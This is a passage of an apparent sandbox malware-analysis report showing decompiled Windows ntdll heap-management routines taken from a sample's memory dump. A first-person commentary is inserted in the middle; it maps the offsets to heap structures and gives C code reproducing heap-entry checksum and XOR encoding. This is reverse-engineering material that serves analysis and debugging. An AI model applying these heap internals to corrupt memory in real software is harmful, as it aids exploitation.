                                          						_push(_t104);
                                          						E0195B150();
                                          					} else {
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push( *0x1a458b4);
                                          					E0195B150("Last known valid blocks: before - %p, after - %p\n",  *0x1a458b0);
                                          				} else {
                                          					_t120 =  *0x1a458b4; // 0x0
                                          					if(_t120 != 0) {
                                          						goto L41;
                                          					}
                                          				}
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E0195B150();
                                          				} else {
                                          					E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				return E0195B150("Stack trace available at %p\n", 0x1a458c0);
                                          			}
                                          Basic-block address column for this routine (0x01a11c10 through 0x01a11e95); the instruction text beside each address did not survive extraction.

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                          • API String ID: 0-2897834094
                                          • Opcode ID: 727ba0940d3afea9113c1b46cd62a02a86d3fb87c59ea1b56344e17ed74f0271
                                          • Instruction ID: e2a1efdf3ac6de9d54240d501b6c811be63eab7a40886112d9f3e849bf1e6a2d
                                          • Opcode Fuzzy Hash: 727ba0940d3afea9113c1b46cd62a02a86d3fb87c59ea1b56344e17ed74f0271
                                          • Instruction Fuzzy Hash: FA61E53A911245DFD792EBB9D484D30B3F5FB84930B0D806EFA0E6B745D6689C418F4A
                                          Uniqueness

                                          Uniqueness Score: -1.00%
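
The routine above, and the one listed next, reach the PEB, the loader module list, the heap header and individual heap entries only through raw 32-bit offsets (fs:[0x30]+0xc, +0xc, +0x2c, +0x240; heap+0x4c, +0x50; segment+0x2c, +0x30; entry+2, +6). The following is an added worked example, my own code and not part of this report, the sample, or ntdll: it gives those offsets their public structure names, checks that the named fields land on exactly those offsets, and reproduces the entry-header checksum and XOR encoding that the EncodeFlagMask/Encoding code applies, so that a one-byte header overwrite can be shown to fail the decode check. Assumed rather than taken from the page: the field names and order (public 32-bit PEB, PEB_LDR_DATA, LDR_DATA_TABLE_ENTRY, HEAP and HEAP_ENTRY layouts), the order of the failure-type names beyond index 0 (the switch above only fixes case 0 as heap_failure_internal; the rest follow the public HEAP_FAILURE_TYPE enumeration), the encoding rule itself (checksum byte, then XOR of the first four header bytes with heap->Encoding), and every key and entry value, which is constructed. It builds on any host without Windows headers.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added example, not code from the report, the sample, or ntdll. Layouts are
 * the public 32-bit structures (field order assumed from them); the offsets
 * commented below are the ones the decompiled listings dereference. */
typedef struct { uint32_t Flink, Blink; } LIST_ENTRY32;
typedef struct { uint16_t Length, MaximumLength; uint32_t Buffer; } UNICODE_STRING32;

typedef struct {                       /* _PEB (32-bit), only what is needed */
    uint8_t  InheritedAddressSpace, ReadImageFileExecOptions, BeingDebugged, BitField;
    uint32_t Mutant, ImageBaseAddress;
    uint32_t Ldr;                      /* 0x0c: *(fs:[0x30] + 0xc) in the listing */
    uint8_t  unused[0x240 - 0x10];
    uint32_t TracingFlags;             /* 0x240: bit 0 tested before the trace call */
} PEB32;

typedef struct {                       /* _PEB_LDR_DATA (32-bit) */
    uint32_t Length; uint8_t Initialized, pad[3]; uint32_t SsHandle;
    LIST_ENTRY32 InLoadOrderModuleList; /* 0x0c: Flink = the main image's entry */
} PEB_LDR_DATA32;

typedef struct {                       /* _LDR_DATA_TABLE_ENTRY (32-bit) */
    LIST_ENTRY32 InLoadOrderLinks, InMemoryOrderLinks, InInitializationOrderLinks;
    uint32_t DllBase, EntryPoint, SizeOfImage;
    UNICODE_STRING32 FullDllName;
    UNICODE_STRING32 BaseDllName;      /* 0x2c: the %wZ argument of "HEAP[%wZ]: " */
} LDR_DATA_TABLE_ENTRY32;

typedef struct {                       /* _HEAP_ENTRY (32-bit), 8 bytes */
    uint16_t Size;                     /* in 8-byte units */
    uint8_t  Flags;                    /* +2: the "& 8" test in the listing */
    uint8_t  SmallTagIndex;            /* +3: checksum of the three bytes before it */
    uint16_t PreviousSize;
    uint8_t  SegmentOffset;            /* +6: read to locate the owning segment */
    uint8_t  UnusedBytes;              /* +7 */
} HEAP_ENTRY32;

typedef struct {                       /* _HEAP (32-bit); a _HEAP_SEGMENT shares this header */
    HEAP_ENTRY32 Entry;
    uint32_t SegmentSignature, SegmentFlags;
    LIST_ENTRY32 SegmentListEntry;
    uint32_t Heap, BaseAddress, NumberOfPages, FirstEntry, LastValidEntry;
    uint32_t NumberOfUnCommittedPages;   /* 0x2c: segment+0x2c -= size >> 12 */
    uint32_t NumberOfUnCommittedRanges;  /* 0x30: segment+0x30 -= 1 */
    uint16_t SegmentAllocatorBackTraceIndex, Reserved;
    LIST_ENTRY32 UCRSegmentList;
    uint32_t Flags, ForceFlags, CompatibilityFlags;
    uint32_t EncodeFlagMask;             /* 0x4c: non-zero => entry headers are encoded */
    HEAP_ENTRY32 Encoding;               /* 0x50: the XOR key */
} HEAP32;

/* 1 if every offset the listings dereference lands on the field named above. */
int layouts_match_listing(void) {
    return offsetof(PEB32, Ldr) == 0x0c && offsetof(PEB32, TracingFlags) == 0x240
        && offsetof(PEB_LDR_DATA32, InLoadOrderModuleList) == 0x0c
        && offsetof(LDR_DATA_TABLE_ENTRY32, BaseDllName) == 0x2c
        && offsetof(HEAP_ENTRY32, Flags) == 2 && offsetof(HEAP_ENTRY32, SegmentOffset) == 6
        && offsetof(HEAP32, NumberOfUnCommittedPages) == 0x2c
        && offsetof(HEAP32, NumberOfUnCommittedRanges) == 0x30
        && offsetof(HEAP32, EncodeFlagMask) == 0x4c && offsetof(HEAP32, Encoding) == 0x50;
}

/* "Error code: %d - %s": index 0 is fixed by the switch in the listing; the
 * rest follow the public HEAP_FAILURE_TYPE order (assumed, not on the page). */
static const char *const heap_failure_names[16] = {
    "heap_failure_internal", "heap_failure_unknown", "heap_failure_generic",
    "heap_failure_entry_corruption", "heap_failure_multiple_entries_corruption",
    "heap_failure_virtual_block_corruption", "heap_failure_buffer_overrun",
    "heap_failure_buffer_underrun", "heap_failure_block_not_busy",
    "heap_failure_invalid_argument", "heap_failure_invalid_allocation_type",
    "heap_failure_usage_after_free", "heap_failure_cross_heap_operation",
    "heap_failure_freelists_corruption", "heap_failure_listentry_corruption",
    "heap_failure_lfh_bitmap_mismatch",
};

const char *heap_failure_name(uint32_t code) {   /* out-of-range fallback is mine */
    return code <= 0xf ? heap_failure_names[code] : "heap_failure_unknown";
}

static uint8_t entry_checksum(const HEAP_ENTRY32 *e) {
    return (uint8_t)e->Size ^ (uint8_t)(e->Size >> 8) ^ e->Flags;
}

/* XOR the first dword (Size, Flags, SmallTagIndex) with the key when encoding
 * is on; symmetric, so it serves both encode and decode (assumed rule). */
static void xor_with_encoding(const HEAP32 *heap, HEAP_ENTRY32 *e) {
    uint32_t w, k;
    if (!heap->EncodeFlagMask) return;
    memcpy(&w, e, 4); memcpy(&k, &heap->Encoding, 4);
    w ^= k; memcpy(e, &w, 4);
}

void heap_entry_encode(const HEAP32 *heap, HEAP_ENTRY32 *e) {
    e->SmallTagIndex = entry_checksum(e);
    xor_with_encoding(heap, e);
}

/* Decode in place; returns 0 when the checksum no longer matches, i.e. the
 * header was overwritten (what the name table above calls entry corruption). */
int heap_entry_decode(const HEAP32 *heap, HEAP_ENTRY32 *e) {
    xor_with_encoding(heap, e);
    return e->SmallTagIndex == entry_checksum(e);
}

/* Constructed heap and entry: encode, flip one byte as an overflow would, and
 * show that the intact copy decodes while the damaged one is rejected. */
int heap_entry_roundtrip_demo(void) {
    HEAP32 heap; memset(&heap, 0, sizeof heap);
    heap.EncodeFlagMask = 0x100000;        /* constructed values, not from the sample */
    heap.Encoding.Size = 0x4c5a; heap.Encoding.Flags = 0x3e; heap.Encoding.SmallTagIndex = 0x91;
    HEAP_ENTRY32 e = { .Size = 0x0030, .Flags = 0x01, .PreviousSize = 0x0008 };
    heap_entry_encode(&heap, &e);
    HEAP_ENTRY32 good = e, bad = e;
    bad.Size ^= 0x0100;                    /* one-byte overwrite into the encoded Size */
    return heap_entry_decode(&heap, &good) == 1 && heap_entry_decode(&heap, &bad) == 0;
}
```

When reading the rest of this report's ntdll listings, the same trick applies: a dereference of fs:[0x30] followed by +0xc, +0xc, +0x2c is the process image name being fetched for the "HEAP[%wZ]: " prefix, and a test of heap+0x4c followed by an XOR with heap+0x50 is header decoding, so an "Error code" line in a debugger log that names entry corruption usually means the checksum in heap_entry_decode failed for a block the sample had written past.
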

                                          C-Code - Quality: 72%
                                          			E0197A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                          				char _v8;
                                          				signed short _v12;
                                          				signed short _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed short _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				unsigned int _v52;
                                          				signed int _v56;
                                          				void* _v60;
                                          				intOrPtr _v64;
                                          				void* _v72;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				unsigned int _t246;
                                          				signed char _t247;
                                          				signed short _t249;
                                          				unsigned int _t256;
                                          				signed int _t262;
                                          				signed int _t265;
                                          				signed int _t266;
                                          				signed int _t267;
                                          				intOrPtr _t270;
                                          				signed int _t280;
                                          				signed int _t286;
                                          				signed int _t289;
                                          				intOrPtr _t290;
                                          				signed int _t291;
                                          				signed int _t317;
                                          				signed short _t320;
                                          				intOrPtr _t327;
                                          				signed int _t339;
                                          				signed int _t344;
                                          				signed int _t347;
                                          				intOrPtr _t348;
                                          				signed int _t350;
                                          				signed int _t352;
                                          				signed int _t353;
                                          				signed int _t356;
                                          				intOrPtr _t357;
                                          				intOrPtr _t366;
                                          				signed int _t367;
                                          				signed int _t370;
                                          				intOrPtr _t371;
                                          				signed int _t372;
                                          				signed int _t394;
                                          				signed short _t402;
                                          				intOrPtr _t404;
                                          				intOrPtr _t415;
                                          				signed int _t430;
                                          				signed int _t433;
                                          				signed int _t437;
                                          				signed int _t445;
                                          				signed short _t446;
                                          				signed short _t449;
                                          				signed short _t452;
                                          				signed int _t455;
                                          				signed int _t460;
                                          				signed short* _t468;
                                          				signed int _t480;
                                          				signed int _t481;
                                          				signed int _t483;
                                          				intOrPtr _t484;
                                          				signed int _t491;
                                          				unsigned int _t506;
                                          				unsigned int _t508;
                                          				signed int _t513;
                                          				signed int _t514;
                                          				signed int _t521;
                                          				signed short* _t533;
                                          				signed int _t541;
                                          				signed int _t543;
                                          				signed int _t546;
                                          				unsigned int _t551;
                                          				signed int _t553;
                                          
                                          				_t450 = __ecx;
                                          				_t553 = __ecx;
                                          				_t539 = __edx;
                                          				_v28 = 0;
                                          				_v40 = 0;
                                          				if(( *(__ecx + 0xcc) ^  *0x1a48a68) != 0) {
                                          					_push(_a4);
                                          					_t513 = __edx;
                                          					L11:
                                          					_t246 = E0197A830(_t450, _t513);
                                          					L7:
                                          					return _t246;
                                          				}
                                          				if(_a8 != 0) {
                                          					__eflags =  *(__edx + 2) & 0x00000008;
                                          					if(( *(__edx + 2) & 0x00000008) != 0) {
                                          						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                          						_t430 = E0197DF24(__edx,  &_v12,  &_v16);
                                          						__eflags = _t430;
                                          						if(_t430 != 0) {
                                          							_t157 = _t553 + 0x234;
                                          							 *_t157 =  *(_t553 + 0x234) - _v16;
                                          							__eflags =  *_t157;
                                          						}
                                          					}
                                          					_t445 = _a4;
                                          					_t514 = _t539;
                                          					_v48 = _t539;
                                          					L14:
                                          					_t247 =  *((intOrPtr*)(_t539 + 6));
                                          					__eflags = _t247;
                                          					if(_t247 == 0) {
                                          						_t541 = _t553;
                                          					} else {
                                          						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                          						__eflags = _t541;
                                          					}
                                          					_t249 = 7 + _t445 * 8 + _t514;
                                          					_v12 = _t249;
                                          					__eflags =  *_t249 - 3;
                                          					if( *_t249 == 3) {
                                          						_v16 = _t514 + _t445 * 8 + 8;
                                          						E01959373(_t553, _t514 + _t445 * 8 + 8);
                                          						_t452 = _v16;
                                          						_v28 =  *(_t452 + 0x10);
                                          						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                          						_v36 =  *(_t452 + 0x14);
                                          						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                          						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                          						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                          						_t256 =  *(_t452 + 0x14);
                                          						__eflags = _t256 - 0x7f000;
                                          						if(_t256 >= 0x7f000) {
                                          							_t142 = _t553 + 0x1ec;
                                          							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                          							__eflags =  *_t142;
                                          							_t256 =  *(_t452 + 0x14);
                                          						}
                                          						_t513 = _v48;
                                          						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                          						_a4 = _t445;
                                          						_v40 = 1;
                                          					} else {
                                          						_t27 =  &_v36;
                                          						 *_t27 = _v36 & 0x00000000;
                                          						__eflags =  *_t27;
                                          					}
                                          					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                          					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                          						_v44 = _t513;
                                          						_t262 = E0195A9EF(_t541, _t513);
                                          						__eflags = _a8;
                                          						_v32 = _t262;
                                          						if(_a8 != 0) {
                                          							__eflags = _t262;
                                          							if(_t262 == 0) {
                                          								goto L19;
                                          							}
                                          						}
                                          						__eflags =  *0x1a48748 - 1;
                                          						if( *0x1a48748 >= 1) {
                                          							__eflags = _t262;
                                          							if(_t262 == 0) {
                                          								_t415 =  *[fs:0x30];
                                          								__eflags =  *(_t415 + 0xc);
                                          								if( *(_t415 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E0195B150();
                                          								} else {
                                          									E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          								}
                                          								_push("(UCRBlock != NULL)");
                                          								E0195B150();
                                          								__eflags =  *0x1a47bc8;
                                          								if( *0x1a47bc8 == 0) {
                                          									__eflags = 1;
                                          									E01A12073(_t445, 1, _t541, 1);
                                          								}
                                          								_t513 = _v48;
                                          								_t445 = _a4;
                                          							}
                                          						}
                                          						_t350 = _v40;
                                          						_t480 = _t445 << 3;
                                          						_v20 = _t480;
                                          						_t481 = _t480 + _t513;
                                          						_v24 = _t481;
                                          						__eflags = _t350;
                                          						if(_t350 == 0) {
                                          							_t481 = _t481 + 0xfffffff0;
                                          							__eflags = _t481;
                                          						}
                                          						_t483 = (_t481 & 0xfffff000) - _v44;
                                          						__eflags = _t483;
                                          						_v52 = _t483;
                                          						if(_t483 == 0) {
                                          							__eflags =  *0x1a48748 - 1;
                                          							if( *0x1a48748 < 1) {
                                          								goto L9;
                                          							}
                                          							__eflags = _t350;
                                          							goto L146;
                                          						} else {
                                          							_t352 = E0198174B( &_v44,  &_v52, 0x4000);
                                          							__eflags = _t352;
                                          							if(_t352 < 0) {
                                          								goto L94;
                                          							}
                                          							_t353 = E01977D50();
                                          							_t447 = 0x7ffe0380;
                                          							__eflags = _t353;
                                          							if(_t353 != 0) {
                                          								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							} else {
                                          								_t356 = 0x7ffe0380;
                                          							}
                                          							__eflags =  *_t356;
                                          							if( *_t356 != 0) {
                                          								_t357 =  *[fs:0x30];
                                          								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                          								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                          									E01A114FB(_t447, _t553, _v44, _v52, 5);
                                          								}
                                          							}
                                          							_t358 = _v32;
                                          							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                          							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                          							__eflags = _t484 - 0x7f000;
                                          							if(_t484 >= 0x7f000) {
                                          								_t90 = _t553 + 0x1ec;
                                          								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                          								__eflags =  *_t90;
                                          							}
                                          							E01959373(_t553, _t358);
                                          							_t486 = _v32;
                                          							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                          							E01959819(_t486);
                                          							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                          							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                          							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                          							__eflags = _t366 - 0x7f000;
                                          							if(_t366 >= 0x7f000) {
                                          								_t104 = _t553 + 0x1ec;
                                          								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                          								__eflags =  *_t104;
                                          							}
                                          							__eflags = _v40;
                                          							if(_v40 == 0) {
                                          								_t533 = _v52 + _v44;
                                          								_v32 = _t533;
                                          								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                          								__eflags = _v24 - _v52 + _v44;
                                          								if(_v24 == _v52 + _v44) {
                                          									__eflags =  *(_t553 + 0x4c);
                                          									if( *(_t553 + 0x4c) != 0) {
                                          										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                          										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                          									}
                                          								} else {
                                          									_t449 = 0;
                                          									_t533[3] = 0;
                                          									_t533[1] = 0;
                                          									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                          									_t491 = _t394;
                                          									 *_t533 = _t394;
                                          									__eflags =  *0x1a48748 - 1; // 0x0
                                          									if(__eflags >= 0) {
                                          										__eflags = _t491 - 1;
                                          										if(_t491 <= 1) {
                                          											_t404 =  *[fs:0x30];
                                          											__eflags =  *(_t404 + 0xc);
                                          											if( *(_t404 + 0xc) == 0) {
                                          												_push("HEAP: ");
                                          												E0195B150();
                                          											} else {
                                          												E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          											}
                                          											_push("((LONG)FreeEntry->Size > 1)");
                                          											E0195B150();
                                          											_pop(_t491);
                                          											__eflags =  *0x1a47bc8 - _t449; // 0x0
                                          											if(__eflags == 0) {
                                          												__eflags = 0;
                                          												_t491 = 1;
                                          												E01A12073(_t449, 1, _t541, 0);
                                          											}
                                          											_t533 = _v32;
                                          										}
                                          									}
                                          									_t533[1] = _t449;
                                          									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                          									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                          										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                          										_v16 = _t402;
                                          										__eflags = _t402 - 0xfe;
                                          										if(_t402 >= 0xfe) {
                                          											_push(_t491);
                                          											_push(_t449);
                                          											E01A1A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                          											_t533 = _v48;
                                          											_t402 = _v32;
                                          										}
                                          										_t449 = _t402;
                                          									}
                                          									_t533[3] = _t449;
                                          									E0197A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                          									_t447 = 0x7ffe0380;
                                          								}
                                          							}
                                          							_t367 = E01977D50();
                                          							__eflags = _t367;
                                          							if(_t367 != 0) {
                                          								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							} else {
                                          								_t370 = _t447;
                                          							}
                                          							__eflags =  *_t370;
                                          							if( *_t370 != 0) {
                                          								_t371 =  *[fs:0x30];
                                          								__eflags =  *(_t371 + 0x240) & 1;
                                          								if(( *(_t371 + 0x240) & 1) != 0) {
                                          									__eflags = E01977D50();
                                          									if(__eflags != 0) {
                                          										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          									}
                                          									E01A11411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                          								}
                                          							}
                                          							_t372 = E01977D50();
                                          							_t546 = 0x7ffe038a;
                                          							_t446 = 0x230;
                                          							__eflags = _t372;
                                          							if(_t372 != 0) {
                                          								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          							} else {
                                          								_t246 = 0x7ffe038a;
                                          							}
                                          							__eflags =  *_t246;
                                          							if( *_t246 == 0) {
                                          								goto L7;
                                          							} else {
                                          								__eflags = E01977D50();
                                          								if(__eflags != 0) {
                                          									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                          									__eflags = _t546;
                                          								}
                                          								_push( *_t546 & 0x000000ff);
                                          								_push(_v36);
                                          								_push(_v40);
                                          								goto L120;
                                          							}
                                          						}
                                          					} else {
                                          						L19:
                                          						_t31 = _t513 + 0x101f; // 0x101f
                                          						_t455 = _t31 & 0xfffff000;
                                          						_t32 = _t513 + 0x28; // 0x28
                                          						_v44 = _t455;
                                          						__eflags = _t455 - _t32;
                                          						if(_t455 == _t32) {
                                          							_t455 = _t455 + 0x1000;
                                          							_v44 = _t455;
                                          						}
                                          						_t265 = _t445 << 3;
                                          						_v24 = _t265;
                                          						_t266 = _t265 + _t513;
                                          						__eflags = _v40;
                                          						_v20 = _t266;
                                          						if(_v40 == 0) {
                                          							_t266 = _t266 + 0xfffffff0;
                                          							__eflags = _t266;
                                          						}
                                          						_t267 = _t266 & 0xfffff000;
                                          						_v52 = _t267;
                                          						__eflags = _t267 - _t455;
                                          						if(_t267 < _t455) {
                                          							__eflags =  *0x1a48748 - 1; // 0x0
                                          							if(__eflags < 0) {
                                          								L9:
                                          								_t450 = _t553;
                                          								L10:
                                          								_push(_t445);
                                          								goto L11;
                                          							}
                                          							__eflags = _v40;
                                          							L146:
                                          							if(__eflags == 0) {
                                          								goto L9;
                                          							}
                                          							_t270 =  *[fs:0x30];
                                          							__eflags =  *(_t270 + 0xc);
                                          							if( *(_t270 + 0xc) == 0) {
                                          								_push("HEAP: ");
                                          								E0195B150();
                                          							} else {
                                          								E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          							}
                                          							_push("(!TrailingUCR)");
                                          							E0195B150();
                                          							__eflags =  *0x1a47bc8;
                                          							if( *0x1a47bc8 == 0) {
                                          								__eflags = 0;
                                          								E01A12073(_t445, 1, _t541, 0);
                                          							}
                                          							L152:
                                          							_t445 = _a4;
                                          							L153:
                                          							_t513 = _v48;
                                          							goto L9;
                                          						}
                                          						_v32 = _t267;
                                          						_t280 = _t267 - _t455;
                                          						_v32 = _v32 - _t455;
                                          						__eflags = _a8;
                                          						_t460 = _v32;
                                          						_v52 = _t460;
                                          						if(_a8 != 0) {
                                          							L27:
                                          							__eflags = _t280;
                                          							if(_t280 == 0) {
                                          								L33:
                                          								_t446 = 0;
                                          								__eflags = _v40;
                                          								if(_v40 == 0) {
                                          									_t468 = _v44 + _v52;
                                          									_v36 = _t468;
                                          									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                          									__eflags = _v20 - _v52 + _v44;
                                          									if(_v20 == _v52 + _v44) {
                                          										__eflags =  *(_t553 + 0x4c);
                                          										if( *(_t553 + 0x4c) != 0) {
                                          											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                          											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                          										}
                                          									} else {
                                          										_t468[3] = 0;
                                          										_t468[1] = 0;
                                          										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                          										_t521 = _t317;
                                          										 *_t468 = _t317;
                                          										__eflags =  *0x1a48748 - 1; // 0x0
                                          										if(__eflags >= 0) {
                                          											__eflags = _t521 - 1;
                                          											if(_t521 <= 1) {
                                          												_t327 =  *[fs:0x30];
                                          												__eflags =  *(_t327 + 0xc);
                                          												if( *(_t327 + 0xc) == 0) {
                                          													_push("HEAP: ");
                                          													E0195B150();
                                          												} else {
                                          													E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          												}
                                          												_push("(LONG)FreeEntry->Size > 1");
                                          												E0195B150();
                                          												__eflags =  *0x1a47bc8 - _t446; // 0x0
                                          												if(__eflags == 0) {
                                          													__eflags = 1;
                                          													E01A12073(_t446, 1, _t541, 1);
                                          												}
                                          												_t468 = _v36;
                                          											}
                                          										}
                                          										_t468[1] = _t446;
                                          										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                          										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                          										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                          											_t320 = _t446;
                                          										} else {
                                          											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                          											_v12 = _t320;
                                          											__eflags = _t320 - 0xfe;
                                          											if(_t320 >= 0xfe) {
                                          												_push(_t468);
                                          												_push(_t446);
                                          												E01A1A80D(_t522, 3, _t468, _t541);
                                          												_t468 = _v52;
                                          												_t320 = _v28;
                                          											}
                                          										}
                                          										_t468[3] = _t320;
                                          										E0197A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                          									}
                                          								}
                                          								E0197B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                          								E0197A830(_t553, _v64, _v24);
                                          								_t286 = E01977D50();
                                          								_t542 = 0x7ffe0380;
                                          								__eflags = _t286;
                                          								if(_t286 != 0) {
                                          									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          								} else {
                                          									_t289 = 0x7ffe0380;
                                          								}
                                          								__eflags =  *_t289;
                                          								if( *_t289 != 0) {
                                          									_t290 =  *[fs:0x30];
                                          									__eflags =  *(_t290 + 0x240) & 1;
                                          									if(( *(_t290 + 0x240) & 1) != 0) {
                                          										__eflags = E01977D50();
                                          										if(__eflags != 0) {
                                          											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          										}
                                          										E01A11411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                          									}
                                          								}
                                          								_t291 = E01977D50();
                                          								_t543 = 0x7ffe038a;
                                          								__eflags = _t291;
                                          								if(_t291 != 0) {
                                          									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          								} else {
                                          									_t246 = 0x7ffe038a;
                                          								}
                                          								__eflags =  *_t246;
                                          								if( *_t246 != 0) {
                                          									__eflags = E01977D50();
                                          									if(__eflags != 0) {
                                          										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          										__eflags = _t543;
                                          									}
                                          									_push( *_t543 & 0x000000ff);
                                          									_push(_t446);
                                          									_push(_t446);
                                          									L120:
                                          									_push( *(_t553 + 0x74) << 3);
                                          									_push(_v52);
                                          									_t246 = E01A11411(_t446, _t553, _v44, __eflags);
                                          								}
                                          								goto L7;
                                          							}
                                          							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                          							_t339 = E0198174B( &_v44,  &_v52, 0x4000);
                                          							__eflags = _t339;
                                          							if(_t339 < 0) {
                                          								L94:
                                          								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                          								__eflags = _v40;
                                          								if(_v40 == 0) {
                                          									goto L153;
                                          								}
                                          								E0197B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                          								goto L152;
                                          							}
                                          							_t344 = E01977D50();
                                          							__eflags = _t344;
                                          							if(_t344 != 0) {
                                          								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							} else {
                                          								_t347 = 0x7ffe0380;
                                          							}
                                          							__eflags =  *_t347;
                                          							if( *_t347 != 0) {
                                          								_t348 =  *[fs:0x30];
                                          								__eflags =  *(_t348 + 0x240) & 1;
                                          								if(( *(_t348 + 0x240) & 1) != 0) {
                                          									E01A114FB(_t445, _t553, _v44, _v52, 6);
                                          								}
                                          							}
